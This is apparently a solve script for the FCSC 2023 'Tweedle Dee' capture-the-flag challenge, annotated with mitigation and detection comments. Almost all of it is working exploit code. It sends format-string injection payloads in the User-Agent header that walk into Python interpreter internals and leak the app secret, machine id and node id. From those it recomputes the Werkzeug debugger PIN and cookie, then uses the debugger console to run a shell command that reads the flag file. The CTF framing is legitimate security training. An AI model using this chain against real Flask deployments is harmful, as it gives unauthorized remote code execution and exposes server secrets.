FCSC 2023 - Tweedle Dee
# FCSC 2023 "Tweedle Dee" solve script.
#
# Two server-side weaknesses are chained here, both visible in the requests below:
#   1. a request header is interpolated as a str.format *template* rather than
#      as an argument, so "{ua.__init__.__globals__[...]...}" walks attributes
#      and mappings from the formatted object into interpreter internals
#      (format-string injection -> arbitrary read of process state);
#   2. the Werkzeug debugger is reachable, and its PIN is a pure function of
#      values that the read primitive recovers, so the console accepts commands.
# Mitigation: format with user input as data, never as the template (e.g.
# "Hello {}".format(ua) -- the exact template on the server is inferred from
# the "Hello " prefix parsed below), and never expose the debugger beyond a
# developer's own machine.
# Detection: the header payloads contain "__globals__"/"sys.modules", and the
# console traffic uses fixed "__debugger__"/"cmd" params and a "__wzd" cookie.
import requests
from bs4 import BeautifulSoup
import hashlib
from itertools import chain
import os, re, time

# Per-run cache-buster sent as the "r" query parameter on every request.
rand = os.urandom(4).hex()
# the remote has some really funky caching and multiple instances...
host = "https://tweedle-dee.france-cybersecurity-challenge.fr/"
# host = "http://localhost:2201/"
# Step 1: dump the interpreter's thread table. `ua` is presumably the object the
# server formats the header into; `__init__.__globals__` reaches the globals of
# its defining module, and the `t` entry there evidently exposes `sys` (what `t`
# actually is cannot be told from this script). From `sys.modules` every loaded
# module is reachable, which is the whole read primitive.
el = BeautifulSoup(
    requests.get(
        host,
        params={"r": rand},
        headers={
            "User-Agent": "{ua.__init__.__globals__[t].sys.modules[threading]._active}"
        },
    ).text,
    "html.parser",
).select_one("#bubble")
# The rendered thread list mentions "serve_forever" for the HTTP server thread;
# the last long number before that text is taken as its ident.
thread_id = re.findall(r"\d{3,}", el.text.split("serve_forever")[0])[-1]
print(thread_id)
# Step 2: from that thread's target object reach the Flask app and read its
# secret, which is sent later as the "s" query parameter of the debugger console.
el = BeautifulSoup(
    requests.get(
        host,
        params={"r": rand},
        headers={
            "User-Agent": "{ua.__init__.__globals__[t].sys.modules[threading]._active[%s]._target.__self__.app.secret}"
            % thread_id
        },
    ).text,
    "html.parser",
).select_one("#bubble")
# The page echoes the formatted value after "Hello " -- this is the only
# assumption the extraction makes about the response layout.
secret = el.text.split("Hello ")[1]
print(secret)
# Step 3: the app's frame table; its first key becomes the "frm" parameter.
el = BeautifulSoup(
    requests.get(
        host,
        params={"r": rand},
        headers={
            "User-Agent": "{ua.__init__.__globals__[t].sys.modules[threading]._active[%s]._target.__self__.app.frames}"
            % thread_id
        },
    ).text,
    "html.parser",
).select_one("#bubble")
frame_id = el.text.split("Hello {")[1].split(":")[0]
print(frame_id)
# Step 4: werkzeug.debug._machine_id, a module-level bytes value (hence the
# b'...' parsing). It is one of the two "private bits" of the PIN derivation.
el = BeautifulSoup(
    requests.get(
        host,
        params={"r": rand},
        headers={
            "User-Agent": "{ua.__init__.__globals__[t].sys.modules[werkzeug.debug]._machine_id}"
        },
    ).text,
    "html.parser",
).select_one("#bubble")
machine_id = el.text.split("b'")[1].split("'")[0]
# Step 5: uuid._node, the other "private bit". Both values are plain module
# attributes, so any read primitive over the process recovers them -- which is
# why the debugger must never be reachable from untrusted networks.
el = BeautifulSoup(
    requests.get(
        host,
        params={"r": rand},
        headers={"User-Agent": "{ua.__init__.__globals__[t].sys.modules[uuid]._node}"},
    ).text,
    "html.parser",
).select_one("#bubble")
node_id = el.text.split("Hello ")[1]
print(node_id, machine_id)
# Werkzeug-style debugger PIN / cookie-name derivation, re-run locally.
#
# The "private" bits are exactly the two values leaked above; the "public"
# bits are guesses about the target (username, app module/class, Flask path
# for Python 3.10) -- if any guess is wrong the derived PIN will not match.
# Defender's view: the PIN's only entropy is process state, so an info-leak
# anywhere in the app turns it into a deterministic computation.
private_bits = [node_id, machine_id]
probably_public_bits = [
    "guest",
    "flask.app",
    "Flask",
    "/usr/local/lib/python3.10/site-packages/flask/app.py",
]
h = hashlib.sha1()
for piece in chain(probably_public_bits, private_bits):
    if not piece:
        continue
    # str pieces are fed as UTF-8; bytes pieces (machine id) go in unchanged.
    h.update(piece.encode("utf-8") if isinstance(piece, str) else piece)
h.update(b"cookiesalt")
# Cookie name: "__wzd" + first 20 hex digits of the salted digest.
cookie_name = "__wzd" + h.hexdigest()[:20]
h.update(b"pinsalt")
# Nine decimal digits of the digest, zero-padded on the left.
num = f"{int(h.hexdigest(), 16):09d}"[:9]
# Group the digits with the largest size that divides evenly (5, then 4, then 3);
# with no match the raw digit string is used as-is.
rv = num
for group_size in (5, 4, 3):
    if len(num) % group_size:
        continue
    chunks = [
        num[i : i + group_size].rjust(group_size, "0")
        for i in range(0, len(num), group_size)
    ]
    rv = "-".join(chunks)
    break
print(cookie_name)
print(rv)
def hash_pin(pin: str) -> str:
    """Return the 12-hex-digit value the debugger cookie carries for *pin*.

    Presumably mirrors the server-side hashing: SHA-1 of ``"<pin> added salt"``,
    truncated to 12 hex characters. The cookie sent later is
    ``"<unix time>|<this value>"``, so once the PIN is known it never has to be
    typed into the console.
    """
    salted = f"{pin} added salt".encode("utf-8", "replace")
    return hashlib.sha1(salted).hexdigest()[:12]
# The three values below are hard-coded from an earlier run and shadow the
# `cookie_name`, `rv` and `secret` computed above; only `frame_id` is still
# taken from this run. Presumably needed because of the per-instance caching
# noted at the top of the script.
cookie_name = "__wzd6e6f57a5f054fef45d76"
rv = "840-396-786"
secret = "8uERxYCjtpHmdKO6qHPO"
# Drive the Werkzeug debugger console: "__debugger__=yes" plus "cmd", the app
# secret "s" and a frame id "frm", authenticated only by the "__wzd..." cookie
# "<unix time>|<hash_pin(pin)>". Knowledge of the PIN is the entire access
# control, and the PIN was computable from leaked process state.
# Repeated ten times, presumably to land on an instance matching the
# hard-coded values.
# Defender's view: every one of these markers (the params, the cookie prefix)
# is static and should never appear in production traffic; the fix is a
# debugger that is disabled outside local development.
for _ in range(10):
    r = requests.get(
        host + "/",
        params={
            "__debugger__": "yes",
            "cmd": "import os;os.popen('cat /app/flag*').read()",
            "s": secret,
            "frm": frame_id,
        },
        cookies={
            cookie_name: f"{int(time.time())}|{hash_pin(rv)}",
        },
    )
    print(r.text)
# FCSC{2c149fdce9b3db514fa6adf094121999fea5c38fbb3370350d90925238499cf2}